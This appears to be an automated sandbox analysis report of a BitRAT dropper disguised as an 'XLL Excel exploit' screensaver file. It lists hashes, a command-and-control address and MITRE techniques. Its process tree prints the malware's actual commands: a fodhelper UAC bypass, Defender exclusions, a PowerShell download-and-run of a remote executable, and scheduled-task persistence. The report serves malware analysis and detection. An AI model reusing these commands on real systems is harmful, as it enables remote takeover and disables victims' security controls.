Analysis

  • max time kernel
    106s
  • max time network
    109s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20220812-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    18-09-2022 18:33

General

  • Target
    XLL-EXCEL-EXPLOIT--main/XLL EXCEL EXPLOIT/project‮nls.scr
  • Size
    90KB
  • MD5
    f257db29d0439adc56190a15a6336b90
  • SHA1
    7e974d2a767fa11832a0ae08f490d26ad552aebb
  • SHA256
    21e2dbf71e3f8f5c26914792ef4889d7a85cba85420e467917e7f1bd4ee56dd0
  • SHA512
    8503c5e71cb6e9232527431a527b21dccd0d60baa1b69e560a334b2d7a682cd51c8e21942e83e1d1202426fd7434e88da9c7197420ed116c4780e78ef49a4dbe
  • SSDEEP
    96:/WKqcNOUKaSG7BzIIt//JROTTcliIG8xmmPM+MSpiME7zGM62l1FsfjvKZtttttz:/W0NOUKaFvaAmH762nmK89u1

Score
10/10

Malware Config

Extracted
  • Language
    ps1
  • Deobfuscated
  • URLs
    exe.dropper: http://asamyz.com/ini.exe

Extracted
  • Family
    bitrat
  • Version
    1.38
  • C2
    wwww.ddnsgeek.com:59599
  • Attributes
    • communication_password
      32c93a52f919c37c05b22825e5a57a4a
    • tor_process
      tor

Signatures

  • BitRAT

    BitRAT is a remote access tool written in C++ and uses leaked source code from other families.

  • UAC bypass 3 TTPs 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Sets file to hidden 1 TTPs 2 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 7 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\project‮nls.scr
    "C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\project‮nls.scr" /S
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4304
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\packages\info.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4992
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\XLL-EXCEL-EXPLOIT--main\XLL EXCEL EXPLOIT\packages\info.bat"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4936
        • C:\Windows\system32\reg.exe
          REG ADD "HKCU\SOFTWARE\ClAsses\ms-settings\shell\open\commAnd" /t REG_SZ /d "C:\windows\SYStem32\cmd.exe /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F" /F
          4⤵
          • Modifies registry class
          PID:2276
        • C:\Windows\system32\reg.exe
          REG ADD "hkcu\soFtwARE\clAsses\ms-settings\shell\open\commAnd" /v DelegAteExecute /t REG_SZ /d " " /F
          4⤵
          • Modifies registry class
          PID:2680
        • C:\Windows\system32\fodhelper.exe
          FodhelpeR.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1812
          • C:\windows\SYStem32\cmd.exe
            "C:\windows\SYStem32\cmd.exe" /c REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:540
            • C:\Windows\system32\reg.exe
              REG ADD HKLM\soFtwARE\micRosoFt\windows\cuRREntveRsion\policies\SYStem /v ConsentPRomptBehAvioRAdmin /t REG_DWORD /d 0 /F
              6⤵
              • UAC bypass
              • Modifies registry key
              PID:4540
        • C:\Windows\SYStem32\cacls.exe
          "C:\Windows\SYStem32\cAcls.exe" "C:\Windows\SYStem32\conFig\SYStem"
          4⤵
            PID:748
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            poWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".bat""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2904
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            poWERshell.exe -c "ADD-MpPREFeREnce -ExclusionExtension ".exe""
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2596
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            poWERshell.exe -c (New-Object System.Net.WebClient).DownloadFile('http://asamyz.com/ini.exe','C:\Users\Admin\profile\svchost.exe');Start-Process 'C:\Users\Admin\profile\svchost.exe'
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2040
            • C:\Users\Admin\profile\svchost.exe
              "C:\Users\Admin\profile\svchost.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3168
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            poWERshell.exe -c "Start-Process -FilePath schtasks -ArgumentList '/Create', '/sc ONLOGON', '/tn profile', '/IT', '/rl HIGHEST', '/TR', \"C:\Users\Admin\profile\svchost.exe\" -verb RunAs"
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4220
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /Create /sc ONLOGON /tn profile /IT /rl HIGHEST /TR C:\Users\Admin\profile\svchost.exe
              5⤵
              • Creates scheduled task(s)
              PID:3212
          • C:\Windows\system32\schtasks.exe
            schtasks /create /sc minute /mo 2 /tn "spawn" /tr C:\Users\Admin\profile\svchost.exe
            4⤵
            • Creates scheduled task(s)
            PID:3764
          • C:\Windows\system32\attrib.exe
            attrib +S +H C:\Users\Admin\profile
            4⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:4672
          • C:\Windows\system32\attrib.exe
            attrib +S +H C:\Users\Admin\profile\svchost.exe
            4⤵
            • Sets file to hidden
            • Views/modifies file attributes
            PID:1612
          • C:\Windows\system32\timeout.exe
            timeout /T 3
            4⤵
            • Delays execution with timeout.exe
            PID:4772
          • C:\Windows\system32\taskkill.exe
            taskkill /F /IM cmd.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1884
    • C:\Users\Admin\profile\svchost.exe
      C:\Users\Admin\profile\svchost.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of AdjustPrivilegeToken
      PID:3036

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    • Execution: Scheduled Task (1) T1053
    • Persistence: Hidden Files and Directories (2) T1158; Scheduled Task (1) T1053
    • Privilege Escalation: Bypass User Account Control (1) T1088; Scheduled Task (1) T1053
    • Defense Evasion: Bypass User Account Control (1) T1088; Disabling Security Tools (1) T1089; Modify Registry (2) T1112; Hidden Files and Directories (2) T1158
    • Discovery: Query Registry (1) T1012; System Information Discovery (2) T1082


    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize: 2KB
      MD5: d85ba6ff808d9e5444a4b369f5bc2730
      SHA1: 31aa9d96590fff6981b315e0b391b575e4c0804a
      SHA256: 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
      SHA512: 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize: 944B
      MD5: bd5940f08d0be56e65e5f2aaf47c538e
      SHA1: d7e31b87866e5e383ab5499da64aba50f03e8443
      SHA256: 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
      SHA512: c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize: 944B
      MD5: 5cfe303e798d1cc6c1dab341e7265c15
      SHA1: cd2834e05191a24e28a100f3f8114d5a7708dc7c
      SHA256: c4d16552769ca1762f6867bce85589c645ac3dc490b650083d74f853f898cfab
      SHA512: ef151bbe0033a2caf2d40aff74855a3f42c8171e05a11c8ce93c7039d9430482c43fe93d9164ee94839aff253cad774dbf619dde9a8af38773ca66d59ac3400e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize: 1KB
      MD5: dfaae5f3c96bca0fa2edba259573d14d
      SHA1: f21aa6ba7a823499ee39ed47de6ec65886b30c63
      SHA256: 434301dc57e6261328bc04cac4ffdaf03b4c525d81519cc599ab60d1761551ea
      SHA512: b60e4e4cd39a9432e2fc9897bf81bbda8a56eee24d559f1effb369dd1745311e004849a9dc4e2b8921bf526edc8caf263a6bc974612da23ed16816e98b17d2ba

    • C:\Users\Admin\profile\svchost.exe
      Filesize: 3.8MB
      MD5: 221e0fa159b0892c04254280d9a46674
      SHA1: fbe9558c1bf14a8ec59b918084de51d6f7d9037b
      SHA256: 8ac53eb721a6ae815a870b81dad63a155c6518e20a84735550ed1f83dd380eb7
      SHA512: 084f35c331ec3c5a19dde1e5531b82206f2b5c2b0b3d315e72fca824890a4480141448c2fd22f65a00ffcb9de64103fe9e95282906154f6d24857be64a8ef8f9

